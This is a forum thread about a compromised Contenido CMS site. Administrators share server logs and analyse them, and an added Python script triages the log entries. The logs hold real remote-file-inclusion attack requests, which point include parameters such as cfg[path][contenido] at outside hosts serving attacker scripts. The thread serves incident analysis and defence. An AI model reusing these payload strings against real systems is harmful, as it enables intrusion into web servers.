Contenido hacked...

Questions about installing CONTENIDO 4.9? Problems with configuration? Tips or questions about developing the system or about security?
GaMbIt_
Posts: 674
Joined: Thu 16 Mar 2006, 16:17

Contenido hacked...

Post by GaMbIt_ » Mon 25 May 2009, 16:37

Today I had a complete outage of a Contenido installation...

So far I don't know anything specific...
Oh, and.. it's a Windows 2003 Server, all current service packs, IIS 6, PHP 5.1 something... MySQL 5.1.34 Community

But here's the log file after I restored the backup...
alled with no query pending in Module ID 50.
[25-May-2009 06:47:49] /projekt/cms/front_content.php?idcat=5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??
[25-May-2009 06:47:49] /projekt/cms/front_content.php?idcat=5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg?? next_record called with no query pending in Module ID 50.
[25-May-2009 06:48:47] /projekt/cms/front_content.php?idcat=5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??
[25-May-2009 06:48:47] /projekt/cms/front_content.php?idcat=5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg?? next_record called with no query pending in Module ID 50.
[25-May-2009 08:53:03] /projekt/cms/front_content.php?idcat=5%20%20/errors.php?error=http://geocities.com/coreto3/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?error=http://geocities.com/coreto3/1.txt??' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 /errors.php?error=http://geocities.com/coreto3/1.txt??
[25-May-2009 08:53:03] /projekt/cms/front_content.php?idcat=5%20%20/errors.php?error=http://geocities.com/coreto3/1.txt?? next_record called with no query pending in Module ID 50.
[25-May-2009 08:53:04] /projekt/cms/front_content.php?idcat=5%20%20/errors.php?error=http://geocities.com/coreto3/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?error=http://geocities.com/coreto3/1.txt??' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 /errors.php?error=http://geocities.com/coreto3/1.txt??
[25-May-2009 08:53:04] /projekt/cms/front_content.php?idcat=5%20%20/errors.php?error=http://geocities.com/coreto3/1.txt?? next_record called with no query pending in Module ID 50.
[25-May-2009 10:20:31] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright??? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???
[25-May-2009 10:20:31] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright??? next_record called with no query pending in Module ID 50.
[25-May-2009 10:37:55] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?
[25-May-2009 10:37:55] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt? next_record called with no query pending in Module ID 50.
[25-May-2009 12:22:00] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sunggong.tv/shirohige/fxid.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sunggong.tv/shirohige/fxid.txt?
[25-May-2009 12:22:00] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sunggong.tv/shirohige/fxid.txt? next_record called with no query pending in Module ID 50.
[25-May-2009 12:28:41] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:28:41] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:44:05] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:44:05] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:44:23] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:44:23] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:44:47] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:44:47] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:52:29] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:52:29] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:52:50] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:52:50] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:53:07] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:53:07] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:04:28] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:04:28] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:28:29] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:28:29] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:28:52] /front_content.php?idcat=85 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:28:52] /front_content.php?idcat=85 next_record called with no query pending in Module ID 68.
[25-May-2009 13:29:13] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:29:13] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:29:36] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:29:36] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:30:05] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:30:05] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:30:43] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:30:43] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:31:16] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:31:16] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:43:20] /projekt/cms/front_content.php?idcat=67//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 67//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?
[25-May-2009 13:43:20] /projekt/cms/front_content.php?idcat=67//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? next_record called with no query pending in Module ID 50.
[25-May-2009 13:50:00] PHP Fatal error: Maximum execution time of 30 seconds exceeded in C:\Inetpub\wwwroot\projekt\contenido\plugins\content_allocation\includes\functions.chains.php on line 31
[25-May-2009 14:36:56] PHP Fatal error: Maximum execution time of 30 seconds exceeded in C:\Inetpub\wwwroot\projekt\cms\front_content.php(981) : eval()'d code on line 404
[25-May-2009 14:41:59] PHP Fatal error: Maximum execution time of 30 seconds exceeded in C:\Inetpub\wwwroot\projekt\contenido\includes\pseudo-cron.inc.php on line 207
Useful Contenido info can be found here: Contenido Wiki

GaMbIt_
Posts: 674
Joined: Thu 16 Mar 2006, 16:17

Re: Contenido hacked...

Post by GaMbIt_ » Mon 25 May 2009, 16:39

By the way, every file was modified...
And a
inserted...
Useful Contenido info can be found here: Contenido Wiki

GaMbIt_
Posts: 674
Joined: Thu 16 Mar 2006, 16:17

Re: Contenido hacked...

Post by GaMbIt_ » Mon 25 May 2009, 16:49

Oh, by the way.. it's a current Contenido 4.8.11 without AMR, since it's Windows...
Useful Contenido info can be found here: Contenido Wiki

GaMbIt_
Posts: 674
Joined: Thu 16 Mar 2006, 16:17

Re: Contenido hacked...

Post by GaMbIt_ » Mon 25 May 2009, 17:31

And one more thing...
Let's take this one line...
[25-May-2009 10:20:31] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright??? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???
the file contenido/includes/include.newsletter_jobs_subnav.php does not exist on this system...

Somehow I have the feeling that something is fishy here...
Useful Contenido info can be found here: Contenido Wiki

dreamdancer
Posts: 15
Joined: Thu 10 Jul 2008, 22:17

Re: Contenido hacked...

Post by dreamdancer » Mon 25 May 2009, 22:11

Hello,

I've also had entries like these in our Contenido log over the last few days:
88.84.147.205 - - [20/May/2009:11:05:42 +0200] "GET /cms//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://aladin-online.com/new/components ... r/test.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
88.84.147.205 - - [20/May/2009:11:05:42 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://aladin-online.com/new/components ... r/test.txt??? HTTP/1.1" 200 12 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
205.234.185.80 - - [20/May/2009:11:17:54 +0200] "GET /cms//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
205.234.185.80 - - [20/May/2009:11:17:54 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 200 12 "-" "Mozilla/5.0"
205.234.185.80 - - [20/May/2009:11:17:54 +0200] "GET /cms/front_content.php?idcat=47&lang=1//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 200 8937 "-" "Mozilla/5.0"
205.234.185.80 - - [20/May/2009:11:24:50 +0200] "GET /cms/front_content.php?idcat=4&hellip;//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 200 9646 "-" "Mozilla/5.0"
with changing IP addresses and changing target addresses.

There are also entries like these:
85.177.149.196 - - [20/May/2009:09:50:52 +0200] "GET /cms/front_content.php?idcat=http://servicepack.sppages.com/index.htm? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
85.177.149.196 - - [20/May/2009:09:50:52 +0200] "GET /cms/front_content.php?idcat=1&idart=132&lang=1 HTTP/1.1" 200 8206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
and
92.72.95.6 - - [23/May/2009:00:40:43 +0200] "GET /cms/front_content.php?idcat=http://74.208.173.138:5553/index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
92.72.95.6 - - [23/May/2009:00:40:44 +0200] "GET /cms/front_content.php?idcat=1&idart=132&lang=1 HTTP/1.1" 200 8206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
92.72.95.6 - - [23/May/2009:00:40:48 +0200] "GET /cms/front_content.php?idcat=http://74.208.173.138:5553/index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
92.72.95.6 - - [23/May/2009:00:40:48 +0200] "GET /cms/front_content.php?idcat=1&idart=132&lang=1 HTTP/1.1" 200 8206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Are these attack attempts on Contenido systems once again?

I haven't found any modified files on our side. (Contenido 4.8.11)

Regards, Dreamdancer

http://www.autopark-ost-fichtner.de

Oldperl
Posts: 4254
Joined: Thu 30 Jun 2005, 22:56
Location: Eltmann, Unterfranken, Bayern

Re: Contenido hacked...

Post by Oldperl » Wed 27 May 2009, 10:45

dreamdancer wrote: I've also had entries like these in our Contenido log over the last few days:
But are you sure that this is the Contenido log? It looks more like the Apache access log to me.
HTTP/1.1" 200 8937 "-" "Mozilla/5.0"
is concerning, because it means the caller received the file without an error. Here one should ask about the Contenido version and about how an upgrade was carried out, in case leftover files are still present.
"GET /cms//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://aladin-online.com/new/components ... r/test.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
shows that it is/was only an attempt and that it was not successful.
see http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html

Greetings from Franconia

Ortwin
ConLite 2.1, alternative and stable update of Contenido 4.8.x under PHP 7.x - download and repo on Gitport.de
phpBO Search Advanced - the search-term plugin for CONTENIDO 4.9
My developer blog

dreamdancer
Posts: 15
Joined: Thu 10 Jul 2008, 22:17

Re: Contenido hacked...

Post by dreamdancer » Wed 27 May 2009, 13:40

Hello Oldperl,

it was of course the Apache log.

The requests for "contenido/includes/include.newsletter_jobs_subnav.php" with the 200 status return an "Illegal Call" in the response (as intended). The Contenido version is 4.8.11, and the affected directories are always completely replaced by the new ones during an upgrade.

According to Auntie Google, this seems to be yet another cross-site scripting attempt targeting version 4.8.4. See also http://secunia.com/advisories/30683/ (from last year).

Regards, Mario
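
The triage discussed in the two posts above (status code plus response size for requests that carry a remote URL in a parameter), as an added example that is not part of the original thread. The log lines are constructed, and the 12-byte guard size is an assumption derived from the "Illegal Call" response dreamdancer reports.

```python
import re
from urllib.parse import unquote

# Apache combined log: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# A parameter value that is itself a remote URL is the probe signature
# visible in the thread's log lines (e.g. cfg[path][contenido]=http://...).
REMOTE_URL_RE = re.compile(r'=\s*(?:https?|ftp)://', re.IGNORECASE)

# Assumption taken from the thread: the include answers "Illegal Call"
# when called directly, which would explain 200 responses of 12 bytes.
GUARD_BODY = "Illegal Call"


def classify(line, guard_len=len(GUARD_BODY)):
    """Return a triage record for a remote-URL probe, or None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m["target"])          # %5B / %5D -> [ / ]
    if not REMOTE_URL_RE.search(target):
        return None
    status = int(m["status"])
    size = 0 if m["size"] == "-" else int(m["size"])
    if status == 404:
        verdict = "not-found"              # no script at the requested path
    elif status in (301, 302):
        verdict = "redirect"               # application bounced the request
    elif status == 200 and size == guard_len:
        verdict = "guard-size"             # size matches the guard message
    elif status == 200:
        verdict = "served-review"          # a full page was rendered
    else:
        verdict = "other"
    return {"ip": m["ip"], "time": m["time"], "status": status, "size": size,
            "path": target.split("?", 1)[0], "verdict": verdict}


def triage(lines):
    """Classify every line and keep only the probes."""
    return [r for r in map(classify, lines) if r is not None]


# Constructed sample lines (documentation IPs, example.invalid host).
PROBE = ("/contenido/includes/include.newsletter_jobs_subnav.php"
         "?cfg%5Bpath%5D%5Bcontenido%5D=http://example.invalid/1.txt?")
TS = "[20/May/2009:11:17:54 +0200]"
SAMPLE = [
    f'192.0.2.10 - - {TS} "GET /cms/{PROBE} HTTP/1.1" 404 256 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - {TS} "GET /{PROBE} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - {TS} "GET /cms/front_content.php?idcat=47&lang=1/{PROBE}'
    ' HTTP/1.1" 200 8937 "-" "Mozilla/5.0"',
    f'192.0.2.20 - - {TS} "GET /cms/front_content.php?idcat='
    'http://example.invalid/index.htm? HTTP/1.1" 302 - "-" "Mozilla/4.0"',
    f'192.0.2.20 - - {TS} "GET /cms/front_content.php?idcat=1&idart=132&lang=1'
    ' HTTP/1.1" 200 8206 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for rec in triage(SAMPLE):
        print(rec["verdict"], rec["status"], rec["size"], rec["path"])
```

A "guard-size" verdict is only a size match, so the response body still has to be confirmed by hand. The "served-review" lines are the ones to correlate with the application's own error log, because the parameter value reached the application.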

GaMbIt_
Posts: 674
Joined: Thu 16 Mar 2006, 16:17

Re: Contenido hacked...

Post by GaMbIt_ » Wed 27 May 2009, 13:45

88.84.147.205 - - [20/May/2009:11:05:42 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://aladin-online.com/new/components ... r/test.txt??? HTTP/1.1" 200 12 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"

still successful... well, well

take a look at the second entry... that one apparently went through...
Useful Contenido info can be found here: Contenido Wiki

dreamdancer
Posts: 15
Joined: Thu 10 Jul 2008, 22:17

Re: Contenido hacked...

Post by dreamdancer » Wed 27 May 2009, 14:23

Hello GaMbIt,

precisely this request is served with "Illegal Call". (Just tested it again.)

http://www.autopark-ost-fichtner.de//co ... r/test.txt???

Just as intended in "include.newsletter_jobs_subnav.php".

Regards, Mario

GaMbIt_
Posts: 674
Joined: Thu 16 Mar 2006, 16:17

Re: Contenido hacked...

Post by GaMbIt_ » Wed 27 May 2009, 14:41

good.. :)

So far I still have no idea how they could have gotten in...
I also only saw the HTTP status 200...
Useful Contenido info can be found here: Contenido Wiki
